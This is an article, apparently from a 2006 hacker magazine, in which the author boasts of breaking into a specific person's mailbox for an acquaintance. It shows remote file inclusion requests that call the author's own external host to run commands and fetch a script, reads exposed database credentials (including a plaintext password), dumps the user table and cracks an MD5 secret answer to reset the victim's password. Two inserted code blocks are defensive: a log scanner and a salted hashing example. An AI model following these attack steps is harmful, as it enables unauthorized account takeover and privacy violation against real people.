Hacking a mailbox and a mail server

It so happened that I had never broken into a mailbox before. But then a tempting offer came
from an acquaintance who desperately needed access to one particular mailbox.
The mailbox itself lived on a small mail host, *.co.uk.
The acquaintance had tried to brute-force the mailbox, but that got him nowhere, so he turned to me.
First I looked over the mail site myself. Apart from the login/password box, it was all plain HTML.
I tried the password entry form for SQL injection, but quotes were filtered.
Server: Apache/1.3.34 (Unix) PHP/5.0.5 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7a
The open ports and their services gave me nothing to be happy about either.

I decided to check who else was hosted there. It turned out that a few dozen sites resolved to this IP.
I went through them; the only phpBB was patched, so none of the exploits worked.
And then I came across an ArticleBeach product, www.articlebeach.com.
The very first request:
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=ls%20-lpa
gave me a listing of the server's files. The ArticleBeach programmers had earned their bread and butter in vain.
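The request above is a classic remote file inclusion probe: the page parameter is handed a URL on a host the attacker controls, and a second parameter carries the command to run. From the defender's side, such requests are easy to spot in the web server's access log. The following is an added example and not code from the original article or from ArticleBeach; it assumes Apache "combined" log lines, and the log entries, IP addresses and the host attacker.invalid are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Simplified Apache "combined" log format: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter value starting with one of these schemes usually means the
# application is being asked to include or fetch attacker-controlled content.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp|php|data|expect)://', re.IGNORECASE)

# Parameter names that are commonly used as a command channel in such probes.
COMMAND_KEYS = {"cmd", "exec", "command"}

# Constructed sample log lines (not real traffic): one plain RFI probe with a
# command parameter, a benign request, a double-URL-encoded probe, and a POST.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2006:21:14:03 +0300] '
    '"GET /index.php?page=http://attacker.invalid/sh&cmd=ls%20-lpa HTTP/1.1" 200 1532',
    '198.51.100.7 - - [10/Mar/2006:21:14:10 +0300] '
    '"GET /index.php?page=about HTTP/1.1" 200 4211',
    '203.0.113.5 - - [10/Mar/2006:21:15:44 +0300] '
    '"GET /index.php?page=%2568ttp%253A%252F%252Fattacker.invalid%252Fsh HTTP/1.1" 200 1480',
    '192.0.2.9 - - [10/Mar/2006:21:16:02 +0300] '
    '"POST /login.php HTTP/1.1" 302 -',
]


def suspicious_params(target):
    """Return the reasons a request target looks like a remote file inclusion probe."""
    reasons = []
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes one layer; decode once more so a double-encoded
        # value such as %2568ttp%253A... is still recognised.
        value = unquote(value).strip()
        if REMOTE_SCHEME_RE.match(value):
            reasons.append(f"param {key!r} carries a remote URL")
        if key.lower() in COMMAND_KEYS:
            reasons.append(f"param {key!r} looks like a command channel")
    return reasons


def scan_log(lines):
    """Parse access log lines and return a record for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the expected format; skip it
        reasons = suspicious_params(m.group("target"))
        if reasons:
            hits.append({
                "ip": m.group("ip"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

A hit with status 200 deserves a closer look than one the application rejected, because it means the include most likely succeeded; the real fix on the application side is to never pass user input to include() at all and to map page names to files through an allow-list.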
Digging around the site, I found another bug kindly left by the ArticleBeach developers:
in the /includes/ directory any user can view the file config.inc, which looks like this.
The sample file is taken from the developer's own site, ArticleBeach: http://www.articlebeach.com/includes/config.inc
<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;

// mysql database server, login, password & database name
$dbserver = "localhost";
$database_connect = "article_art";
$dbuser = "article_jer";
$dbpass = "aaaaa";

$connect = mysql_connect($dbserver, $dbuser, $dbpass)
    or die("Could not connect to MySQL");
mysql_select_db($database_connect, $connect);

?>
As you have already guessed, these are the credentials for the server's database.
Unfortunately, in my case the database password did not work for FTP,
which cannot be said of other sites running the ArticleBeach product.
I had to work the server over through the remote include.
Opening /etc/passwd, I could not find the name of the mail host I needed;
the user logins and the sites' domain names did not match.
But it was possible to browse the users' web directories: /home/*/public_html/
I was about to start grinding through everyone on the list, but decided to check the accounting.log file,
which stores cPanel logins and domain names. And I got the list of domain names.
I picked the right one and began to study its web directory. In the source I quickly found the MySQL database credentials:
'Database' => '***_themail', // Name of your MySQL database
'Username' => '***_postman', // The username and password that
'Password' => 'jkretj3h45j'
Once again, the password did not work for FTP.

All that was left was to attach to the database. I needed to find a writable directory or file.
Again, thanks to the ArticleBeach developers, who took care that their product has a /backup/ directory with drwxrwxrwx permissions.
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=wget -O backup/sql.php http://durito.narod.ru/sql.php
No luck, and the same with GET, links, fetch and lynx. Later I learned that wget and GET were disabled by PHP Secure, and links, fetch and lynx simply were not available.
I continued the internal inspection of the host's sites. I tried a few database passwords, but once again they did not work for FTP; all the passwords were multi-character gibberish.
And suddenly, a Taiwanese site. Intuition prompted me to check it, and there it was, the database password: anahol!!! The password works for FTP, and I upload the script for working with the DB from rst.void.ru.

In the database I find the required table and dump it. And there is the coveted mailbox; the password is indeed hashed with MD5,
but that is fixable, if long and tedious. First, though, I decided to check the hash at http://md5.rednoize.com/, but the password
was not found, and I was ready for a long search when I noticed that the answer to the secret question is also stored as MD5.
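The reason the secret answer fell so quickly is that an unsalted MD5 digest is the same for every user and every site that stores the same answer, so one public lookup table serves them all. As an added example that is not part of the original article, the block below contrasts that scheme with a per-user salted PBKDF2 record: the same answer produces a different record every time it is stored, so a shared table is useless, and verification uses a constant-time comparison. The iteration count and the sample answer are constructed assumptions for the demonstration.

```python
import hashlib
import hmac
import os

# Assumed PBKDF2-HMAC-SHA256 work factor; tune it to the server's hardware.
ITERATIONS = 600_000


def normalize(answer):
    """Secret answers are usually compared case- and whitespace-insensitively."""
    return " ".join(answer.casefold().split())


def md5_digest(answer):
    """The weak scheme from the story: an unsalted MD5 hex digest.

    Deterministic across users and sites, so one precomputed table reverses it.
    """
    return hashlib.md5(normalize(answer).encode("utf-8")).hexdigest()


def store_answer(answer, salt=b""):
    """Return a storable record: per-user 16-byte salt plus a slow KDF output.

    Because the salt is random, the same answer never yields the same record.
    """
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac(
        "sha256", normalize(answer).encode("utf-8"), salt, ITERATIONS
    )
    return {"salt": salt.hex(), "hash": digest.hex(), "iterations": ITERATIONS}


def verify_answer(answer, record):
    """Recompute the KDF with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256",
        normalize(answer).encode("utf-8"),
        bytes.fromhex(record["salt"]),
        record["iterations"],
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


if __name__ == "__main__":
    # Constructed sample answer; not a value from the article.
    answer = "Maple Street"
    print("md5 user A:", md5_digest(answer))
    print("md5 user B:", md5_digest("  maple   street "))  # identical digest
    rec_a = store_answer(answer)
    rec_b = store_answer(answer)
    print("pbkdf2 user A:", rec_a["hash"])
    print("pbkdf2 user B:", rec_b["hash"])  # differs thanks to the salt
    print("verify correct:", verify_answer("maple street", rec_a))
    print("verify wrong:  ", verify_answer("Oak Street", rec_a))
```

Salting and a slow KDF only raise the cost per guess; a secret answer that is a common surname remains guessable, which is why a recovery flow should not reset the password on the strength of one short answer alone.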


I look up the secret question's hash on md5.rednoize.com and there it is: Cheung!!!


I go to the mail server and answer the secret question. I am offered to enter a new password and confirm it. Checkmate!
And my friend gets access to the coveted mailbox, and for me the beer is rolled out, which I retire to eagerly absorb.

Published on www.xakep.ru

Your bug, Durito.
_________________
EAT THE RICH!

Created 1996-2005 by durito. Copyright 2006 by durito
All Rights Reserved